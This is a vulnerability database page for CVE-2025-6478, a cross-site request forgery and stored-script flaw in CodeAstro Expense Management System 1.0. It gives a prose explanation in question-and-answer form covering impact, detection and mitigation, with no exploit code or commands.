CVE-2025-6478
BaseFortify
Publication date: 2025-06-22
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| codeastro | expense_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-352 | The web application does not, or cannot, sufficiently verify whether a request was intentionally provided by the user who sent the request, which could have originated from an unauthorized actor. |
| CWE-862 | The product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-6478 is a Cross-Site Request Forgery (CSRF) vulnerability in CodeAstro Expense Management System version 1.0. An attacker can remotely craft a malicious link that tricks an authenticated user into performing unauthorized actions, such as adding an expense entry without consent. Additionally, the attacker can inject malicious JavaScript into the expense form, which is stored and later executed when the victim views the Manage Expenses page, potentially leading to session cookie theft and account takeover. [1, 2]
How can this vulnerability impact me? :
This vulnerability can allow attackers to perform unauthorized actions on your behalf within the expense management system, such as adding fraudulent expense entries. It also enables injection of malicious JavaScript that can execute when you view certain pages, potentially stealing session cookies and leading to account takeover. This compromises the integrity and security of your account and data. [1, 2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
Detection of this CSRF vulnerability involves monitoring for suspicious HTTP requests that perform state-changing actions without proper user intent verification. Since the vulnerability allows attackers to craft malicious links that trigger unauthorized actions, you can look for unusual POST requests to the 'Add Expense' form or unexpected JavaScript payloads in expense entries. However, no specific detection commands or signatures are currently documented for this vulnerability. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include disabling or restricting access to the affected CodeAstro Expense Management System 1.0 until a patch or update is available. Since no known countermeasures or mitigations are documented, consider replacing the affected product or implementing strict user interaction verification mechanisms such as anti-CSRF tokens. Additionally, educate users to avoid clicking suspicious links and monitor for unusual activity. [2]